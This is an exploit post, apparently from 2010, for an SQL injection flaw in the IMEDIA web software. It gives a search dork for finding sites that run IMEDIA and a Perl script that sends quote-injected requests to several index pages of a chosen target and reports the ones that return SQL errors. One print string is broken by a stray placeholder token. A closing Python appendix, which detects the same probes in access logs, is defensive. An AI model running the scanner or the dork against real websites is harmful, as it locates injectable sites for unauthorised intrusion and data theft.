IMEDIA suffers from a remote SQL injection vulnerability
Source: vfocus.net  Author: Kannibal615  Published: 2010-05-21
# Exploit Title: IMEDIA (index.php) SQL Injection Vulnerability
# Date: 19-05-2010
# Author: Kannibal615
# Link Software: N/A
# Version: N/A
# Tested on: ALL
# CVE: N/A
# Code: 

# DORK : Powered by: Con-Imedia


#!/usr/bin/perl -w

use HTTP::Request;
use LWP::UserAgent;

system ("cls");
print "\n";
print "  @@    @@  @@@@@@     @@    @@    @@@@    @@@@@@@  @@  @@   @@@@@@@  @@@@@\n";
print "  @@    @@  @@   @@    @@    @@   @@  @@   @@       @@ @@    @@       @@   @@\n";
print "  @@    @@  @@ @@@     @@@@@@@@  @@    @@  @@       @@@@     @@@@@@   @@   @@\n";
print "   @@  @@   @@ @@@     @@@@@@@@  @@@@@@@@  @@       @@ @@    @@@@@@   @@ @@\n";
print "    @@@@    @@   @@    @@    @@  @@    @@  @@       @@  @@   @@       @@   @@\n";
print "     @@     @@@@@@     @@    @@  @@    @@  @@@@@@@  @@   @@  @@@@@@@  @@    @@\n\n";
print "                  LA ILAH ILLA ALLAH MOUHAMED RASOUL ALLAH\n\n";
print "\n\n";
print "[*]Coded By: Kannibal615 > Tunisian Genius Security > zn[at]live[dot]de\n\n";
print "[*]Greetz 1: My Best Friend AYMEN > THE P!RATOR\n";
print '[*]Greetz 2: Pc-InseCt/alghaking/emptyzero/V!Ru
___FCKpd___0
T4ckJ3n';
print "\n[*]Greetz 3: To All VBHACKER.NET Members\n";
print "[*]Dork : Powered by: Con-Imedia\n";
print "[*]Usage : k615>[target here]\n";
print "[*]Exemple : k615> www.target.com\n";
print "\n";
print "k615>";
$input=<>;
chomp $input;
if ( $input !~ /^http:/ ) {
    $input = 'http://' . $input;
}
if ( $input !~ /\/$/ ) {
    $input = $input . '/';
}
@path=('index1.php?linkid=999.9"','index1.php?sublinkid=999.9"','index1.php?linkid=&sublink=999.9"',
       'index2.php?linkid=999.9"','index3.php?day=999.9"');
foreach $ways(@path){
    $final=$input.$ways;
    my $req=HTTP::Request->new(GET=>$final);
    my $ua=LWP::UserAgent->new();
    $ua->timeout(30);
    my $response=$ua->request($req);
    if($response->content =~ /sql/ ||
       $response->content =~ /SQL error/ ||
       $response->content =~ /SQL/ ||
       $response->content =~ /syntax/ ||
       $response->content =~ /Invalid query/ ||
       $response->content =~ /your SQL/ ||
       $response->content =~ /MySQL/ ||
       $response->content =~ /at line 1/ ||
       $response->content =~ /MySQL server/ ||
       $response->content =~ /version for/ ||
       $response->content =~ /Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near/ ||
       $response->content =~ /fetch/
    ){
        print "[+] Vulnerable -> $final\n";
    }
    else{
        print "[-] Not Vulner <- $final\n";
    }
}
print "\n\nSOBHAN ALLAH\n";
print "press enter to exit";
$enter=<>;
#db-exploit 19-05-2010
#Coded By Kannibal615
#Tunisian Genius Security
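
A defender-side check for the requests this script sends, added here as an example and not part of the original post: it flags access-log entries for the same scripts and parameters whose values are not plain integers. The integer-only rule, the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and parameters taken from the probe list in the script above.
WATCHED = {
    "index1.php": {"linkid", "sublinkid", "sublink"},
    "index2.php": {"linkid"},
    "index3.php": {"day"},
}
# Assumption: legitimate values are empty or plain non-negative integers.
SAFE_VALUE = re.compile(r"\d*")
# Request line inside a common/combined log format entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (documentation address range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [19/May/2010:10:00:01 +0000] "GET /index1.php?linkid=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [19/May/2010:10:00:02 +0000] "GET /index1.php?linkid=999.9%22 HTTP/1.1" 200 312',
    '203.0.113.9 - - [19/May/2010:10:00:03 +0000] "GET /index1.php?linkid=&sublink=999.9%22 HTTP/1.1" 200 298',
    '203.0.113.9 - - [19/May/2010:10:00:04 +0000] "GET /index3.php?day=999.9%22 HTTP/1.1" 200 301',
    '203.0.113.7 - - [19/May/2010:10:00:05 +0000] "GET /about.php?day=x HTTP/1.1" 200 900',
]

def suspicious_params(log_line):
    """Return [(script, param, value)] for watched parameters with non-integer values."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    script = url.path.rsplit("/", 1)[-1].lower()
    hits = []
    # parse_qsl percent-decodes, so %22 is compared as a literal double quote.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in WATCHED.get(script, ()) and not SAFE_VALUE.fullmatch(value):
            hits.append((script, name, value))
    return hits

def scan(lines):
    """Return (client, script, param, value) for every flagged parameter."""
    return [(line.split(" ", 1)[0], *hit)
            for line in lines for hit in suspicious_params(line)]

if __name__ == "__main__":
    for client, script, param, value in scan(SAMPLE_LOG):
        print(f"{client} {script} {param}={value!r}")
```

The same integer-only rule, enforced in the application before the value reaches the query, removes the error responses the script keys on.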

 